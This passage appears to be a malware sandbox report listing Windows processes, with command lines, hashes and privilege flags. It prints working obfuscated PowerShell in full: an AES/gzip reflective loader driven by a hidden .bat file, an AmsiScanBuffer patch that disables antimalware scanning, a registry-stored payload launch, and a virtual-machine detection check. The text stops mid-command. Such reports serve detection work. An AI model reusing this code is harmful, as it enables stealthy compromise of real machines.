                                                                                                                                                        Commandline:cmd.exe /c echo function elgju($CRcTF){ $KmeGB=[System.Security.Cryptography.Aes]::Create(); $KmeGB.Mode=[System.Security.Cryptography.CipherMode]::CBC; $KmeGB.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $KmeGB.Key=[System.Convert]::FromBase64String('yXhq0Zci7Ki7oYmTRrbYbju3J/i3HBqGk5Zcg1aE0Uo='); $KmeGB.IV=[System.Convert]::FromBase64String('WdcPQiNwNN818it8sRh8xg=='); $TgPAd=$KmeGB.CreateDecryptor(); $dQIvJ=$TgPAd.TransformFinalBlock($CRcTF, 0, $CRcTF.Length); $TgPAd.Dispose(); $KmeGB.Dispose(); $dQIvJ;}function VIxdo($CRcTF){ Invoke-Expression '$VBZuZ=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$CRcTF);'.Replace('blck', ''); Invoke-Expression '$sdANW=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$IHCXJ=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($VBZuZ, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $IHCXJ.CopyTo($sdANW); $IHCXJ.Dispose(); $VBZuZ.Dispose(); $sdANW.Dispose(); $sdANW.ToArray();}function gYUmc($CRcTF,$tscxF){ Invoke-Expression '$jaygU=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$CRcTF);'.Replace('blck', ''); Invoke-Expression '$aZTCr=$jaygU.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression 
'$aZTCr.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $tscxF)blck;'.Replace('blck', '');}$DuTVY = 'C:\Users\user\AppData\Local\Temp\b.bat';$host.UI.RawUI.WindowTitle = $DuTVY;$FQcuc=[System.IO.File]::ReadAllText($DuTVY).Split([Environment]::NewLine);foreach ($BcNGU in $FQcuc) { if ($BcNGU.StartsWith(':: ')) { $sDcLn=$BcNGU.Substring(3); break; }}$fKndv=[string[]]$sDcLn.Split('\');Invoke-Expression '$pcpOF=VIxdo (elgju (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($fKndv[0])));'.Replace('blck', '');Invoke-Expression '$TAQWK=VIxdo (elgju (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($fKndv[1])));'.Replace('blck', '');gYUmc $pcpOF (,[string[]] (''));gYUmc $TAQWK (,[string[]] (''));
                                                                                                                                                        Imagebase:0x7ff6794d0000
                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        Target ID:39
                                                                                                                                                        Start time:18:24:13
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:powershell.exe -WindowStyle Hidden
                                                                                                                                                        Imagebase:0x7ff7b2bb0000
                                                                                                                                                        File size:452'608 bytes
                                                                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        Target ID:40
                                                                                                                                                        Start time:18:24:20
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:"C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
                                                                                                                                                        Imagebase:0x7ff6794d0000
                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:41
Start time:18:24:20
Start date:07/10/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff620390000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:42
Start time:18:24:20
Start date:07/10/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "
Imagebase:0x7ff6794d0000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:43
Start time:18:24:20
Start date:07/10/2024
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:powershell.exe -WindowStyle Hidden
Imagebase:0x7ff7b2bb0000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:44
Start time:18:24:22
Start date:07/10/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
Imagebase:0x7ff6794d0000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:45
Start time:18:24:22
Start date:07/10/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff620390000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:46
Start time:18:24:23
Start date:07/10/2024
Path:C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):false
Commandline:wmic diskdrive get Model
Imagebase:0x7ff67a220000
File size:576'000 bytes
MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:47
Start time:18:24:23
Start date:07/10/2024
Path:C:\Windows\System32\findstr.exe
Wow64 process (32bit):false
Commandline:findstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK"
Imagebase:0x7ff71fdd0000
File size:36'352 bytes
MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:48
Start time:18:24:42
Start date:07/10/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:cmd.exe /c echo function elgju($CRcTF){ $KmeGB=[System.Security.Cryptography.Aes]::Create(); $KmeGB.Mode=[System.Security.Cryptography.CipherMode]::CBC; $KmeGB.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $KmeGB.Key=[System.Convert]::FromBase64String('yXhq0Zci7Ki7oYmTRrbYbju3J/i3HBqGk5Zcg1aE0Uo='); $KmeGB.IV=[System.Convert]::FromBase64String('WdcPQiNwNN818it8sRh8xg=='); $TgPAd=$KmeGB.CreateDecryptor(); $dQIvJ=$TgPAd.TransformFinalBlock($CRcTF, 0, $CRcTF.Length); $TgPAd.Dispose(); $KmeGB.Dispose(); $dQIvJ;}function VIxdo($CRcTF){ Invoke-Expression '$VBZuZ=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$CRcTF);'.Replace('blck', ''); Invoke-Expression '$sdANW=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$IHCXJ=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($VBZuZ, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $IHCXJ.CopyTo($sdANW); $IHCXJ.Dispose(); $VBZuZ.Dispose(); $sdANW.Dispose(); $sdANW.ToArray();}function gYUmc($CRcTF,$tscxF){ Invoke-Expression '$jaygU=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$CRcTF);'.Replace('blck', ''); Invoke-Expression '$aZTCr=$jaygU.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$aZTCr.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $tscxF)blck;'.Replace('blck', '');}$DuTVY = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $DuTVY;$FQcuc=[System.IO.File]::ReadAllText($DuTVY).Split([Environment]::NewLine);foreach ($BcNGU in $FQcuc) { if ($BcNGU.StartsWith(':: ')) { $sDcLn=$BcNGU.Substring(3); break; }}$fKndv=[string[]]$sDcLn.Split('\');Invoke-Expression '$pcpOF=VIxdo (elgju (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($fKndv[0])));'.Replace('blck', '');Invoke-Expression '$TAQWK=VIxdo (elgju (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($fKndv[1])));'.Replace('blck', '');gYUmc $pcpOF (,[string[]] (''));gYUmc $TAQWK (,[string[]] (''));
Imagebase:0x7ff6794d0000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:49
Start time:18:24:42
Start date:07/10/2024
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:powershell.exe -WindowStyle Hidden
Imagebase:0x7ff7b2bb0000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:50
Start time:18:24:52
Start date:07/10/2024
Path:C:\Windows\System32\schtasks.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
Imagebase:0x7ff78bc90000
File size:235'008 bytes
MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:51
Start time:18:24:52
Start date:07/10/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff620390000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:52
Start time:18:24:52
Start date:07/10/2024
Path:C:\Program Files\Windows Defender\MpCmdRun.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
Imagebase:0x7ff79f7e0000
File size:468'120 bytes
MD5 hash:B3676839B2EE96983F9ED735CD044159
Has elevated privileges:true
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:53
Start time:18:24:52
Start date:07/10/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff620390000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:54
Start time:18:24:57
Start date:07/10/2024
Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):true
Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Imagebase:0xa50000
File size:433'152 bytes
MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:true
Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        Target ID:55
                                                                                                                                                        Start time:18:24:57
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                        Imagebase:0x7ff620390000
                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        Target ID:56
                                                                                                                                                        Start time:18:24:57
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
                                                                                                                                                        Imagebase:0xa50000
                                                                                                                                                        File size:433'152 bytes
                                                                                                                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Has exited:true

                                                                                                                                                        Target ID:57
                                                                                                                                                        Start time:18:24:57
                                                                                                                                                        Start date:07/10/2024
                                                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:fuLUlHVbHHgj{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$NnulhBqzTpRDhV,[Parameter(Position=1)][Type]$OFCpxNfkPy)$qvWXxLMOaNu=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+'f'+'l'+'e'+''+'c'+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+[Char](68)+''+'e'+'l'+[Char](101)+''+[Char](103)+''+'a'+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+'Me'+[Char](109)+'o'+[Char](114)+''+[Char](121)+''+[Char](77)+'odul'+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+''+[Char](68)+''+'e'+''+[Char](108)+'e'+[Char](103)+'a'+[Char](116)+''+'e'+'T'+[Char](121)+''+[Char](112)+''+'e'+'','C'+[Char](108)+''+'a'+'ss'+[Char](44)+''+'P'+''+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+'S'+''+[Char](101)+''+[Char](97)+''+'l'+'e'+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+'s'+[Char](105)+''+[Char](67)+'l'+'a'+'s'+[Char](115)+','+[Char](65)+''+[Char](117)+''+[Char](116)+'oC'+'l'+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$qvWXxLMOaNu.DefineConstructor(''+[Char](82)+''+[Char](84)+'S'+[Char](112)+''+[Char](101)+''+'c'+''+'i'+''+[Char](97)+''+[Char](108)+'N'+[Char](97)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+'By'+[Char](83)+''+'i'+''+[Char](103)+''+[Char](44)+'Pu'+'b'+''+'l'+'i'+'c'+'',[Reflection.CallingConventions]::Standard,$NnulhBqzTpRDhV).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+'t'+'i'+''+[Char](109)+''+[Char](101)+',Ma'+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$qvWXxLMOaNu.DefineMethod(''+'I'+''+'n'+''+[Char](118)+''+[Char](111)+''+[Char](107)+''
+[Char](101)+'','P'+'u'+''+[Char](98)+'l'+[Char](105)+'c'+','+''+[Char](72)+''+[Char](105)+'de'+'B'+''+'y'+''+'S'+'i'+[Char](103)+','+[Char](78)+''+'e'+''+'w'+''+'S'+''+[Char](108)+'ot'+[Char](44)+''+'V'+''+'i'+''+'r'+'t'+[Char](117)+''+'a'+'l',$OFCpxNfkPy,$NnulhBqzTpRDhV).SetImplementationFlags(''+'R'+''+'u'+''+[Char](110)+''+'t'+''+[Char](105)+'m'+[Char](101)+''+','+'M'+'a'+'n'+[Char](97)+'g'+[Char](101)+''+'d'+'');Write-Output $qvWXxLMOaNu.CreateType();}$iKNksxDtTNKAc=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+''+'t'+''+[Char](101)+''+'m'+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'')}).GetType(''+'M'+'ic'+[Char](114)+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+[Char](102)+''+'t'+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+[Char](110)+''+'3'+''+[Char](50)+''+'.'+'U'+'n'+''+[Char](115)+''+[Char](97)+''+[Char](102)+''+[Char](101)+''+'N'+''+[Char](97)+''+'t'+''+[Char](105)+''+'v'+''+[Char](101)+''+[Char](77)+''+[Char](101)+''+[Char](116)+''+'h'+''+[Char](111)+''+[Char](100)+''+[Char](115)+'');$yNoIOiWMAQGoVU=$iKNksxDtTNKAc.GetMethod(''+'G'+'e'+[Char](116)+''+'P'+''+[Char](114)+''+[Char](111)+''+'c'+''+'A'+''+'d'+''+[Char](100)+''+'r'+''+[Char](101)+''+[Char](115)+'s',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+'c'+''+[Char](44)+''+'S'+'t'+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$ldjQKaGUcclhcmhFUiK=fuLUlHVbHHgj @([String])([IntPtr]);$OGRkrpCaviqYlLkTxWpljP=fuLUlHVbHHgj 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$JbgpKYFPFWJ=$iKNksxDtTNKAc.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+'Mo'+'d'+''+[Char](117)+''+'l'+''+'e'+'H'+'a'+''+'n'+''+[Char](100)+''+'l'+''+'e'+'').Invoke($Null,@([Object](''+'k'+''+'e'+''+'r'+''+'n'+''+[Char](101)+''+'l'+''+[Char](51)+''+[Char](50)+''+'.'+''+'d'+''+'l'+''+'l'+'')));$PQfPIIgelMLvUB=$yNoIOiWMAQGoVU.Invoke($Null,@([Object]$JbgpKYFPFWJ,[Object]('Lo'+[Char](97)+''+[Char](100)+''+[Char](76)+''+[Char](105)+'b'+[Char](114)+'a'+[Char](114)+''+'y'+''+[Char](65)+'')));$GDgGvFoXzgYhofixb=$yNoIOiWMAQGoVU.Invoke($Null,@([Object]$JbgpKYFPFWJ,[Object](''+[Char](86)+''+[Char](105)+'r'+[Char](116)+''+[Char](117)+''+[Char](97)+'lP'+[Char](114)+''+[Char](111)+''+[Char](116)+'ec'+[Char](116)+'')));$DcSwIDH=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PQfPIIgelMLvUB,$ldjQKaGUcclhcmhFUiK).Invoke(''+[Char](97)+''+[Char](109)+''+'s'+'i'+[Char](46)+''+'d'+''+[Char](108)+''+'l'+'');$rcGSxwaaaaKUimwsu=$yNoIOiWMAQGoVU.Invoke($Null,@([Object]$DcSwIDH,[Object](''+'A'+'m'+[Char](115)+'i'+'S'+'c'+'a'+''+[Char](110)+'B'+[Char](117)+''+[Char](102)+''+'f'+''+[Char](101)+''+'r'+'')));$QQMIPunPos=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GDgGvFoXzgYhofixb,$OGRkrpCaviqYlLkTxWpljP).Invoke($rcGSxwaaaaKUimwsu,[uint32]8,4,[ref]$QQMIPunPos);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$rcGSxwaaaaKUimwsu,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GDgGvFoXzgYhofixb,$OGRkrpCaviqYlLkTxWpljP).Invoke($rcGSxwaaaaKUimwsu,[uint32]8,0x20,[ref]$QQMIPunPos);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+''+[Char](70)+'TW'+'A'+''+[Char](82)+''+'E'+'').GetValue(''+[Char](36)+'r'+[Char](98)+''+[Char](120)+'-'+[Char](115)+'t'+[Char](97)+''+[Char](103)+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"
Imagebase:0x7ff7b2bb0000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:58
Start time:18:24:57
Start date:07/10/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff620390000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:59
Start time:18:25:03
Start date:07/10/2024
Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):true
Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Imagebase:0xa50000
File size:433'152 bytes
MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:60
Start time:18:25:03
Start date:07/10/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff620390000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:61
Start time:18:25:03
Start date:07/10/2024
Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):true
Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Imagebase:0xa50000
File size:433'152 bytes
MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:62
Start time:18:25:03
Start date:07/10/2024
Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):true
Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Imagebase:0xa50000
File size:433'152 bytes
MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:63
Start time:18:25:03
Start date:07/10/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff620390000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:64
Start time:18:25:03
Start date:07/10/2024
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:kveHNQwSSGcg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$mhKVIvEXzPrIho,[Parameter(Position=1)][Type]$QOutAUbbtF)$MsesbhAsMah=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+'e'+'f'+[Char](108)+''+'e'+''+'c'+'te'+'d'+'D'+[Char](101)+'le'+'g'+''+[Char](97)+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+[Char](77)+''+[Char](101)+''+'m'+''+[Char](111)+'ry'+[Char](77)+''+[Char](111)+'dul'+'e'+'',$False).DefineType(''+[Char](77)+'y'+[Char](68)+''+'e'+''+'l'+''+'e'+''+'g'+''+[Char](97)+''+'t'+''+'e'+'T'+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+'C'+''+'l'+''+[Char](97)+''+'s'+'s'+','+''+[Char](80)+''+[Char](117)+''+[Char](98)+'l'+[Char](105)+'c'+[Char](44)+''+[Char](83)+''+[Char](101)+'a'+[Char](108)+'e'+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+''+[Char](115)+''+[Char](105)+'C'+[Char](108)+''+[Char](97)+''+[Char](115)+'s,'+[Char](65)+'u'+[Char](116)+'o'+'C'+'la'+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$MsesbhAsMah.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+[Char](112)+''+'e'+'c'+'i'+''+[Char](97)+''+[Char](108)+''+[Char](78)+'ame'+[Char](44)+''+[Char](72)+''+'i'+'d'+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+'li'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$mhKVIvEXzPrIho).SetImplementationFlags(''+'R'+''+[Char](117)+''+'n'+''+'t'+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+'e'+[Char](100)+'');$MsesbhAsMah.DefineMethod(''+[Char](73)+'nv'+'o'+'k'+'e'+'',''+[Char](80)+''+'u'+''+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+[Char](72)+'i'+'d'+'eB'+'y'+'S'+'i'+'g'+','+''+[Char](78)+''+'e'+'w'+[Char](83)+''+'l'+''+[Char](111)+''+'t'+''+','+''+'V'+''+'i'+''+[Char](114)+''+'t'+''+[Char](117)+''+'a'+'l',$QOutAUbbtF,$mhKVIvEXzPrIho).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+'t'+[Char](105)+'m'+[Char](101)+''+','+''+[Char](77)+'ana'+[Char](103)+''+[Char](101)+'d');Write-Output $MsesbhAsMah.CreateType();}$gFfWslPcsIxEF=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And 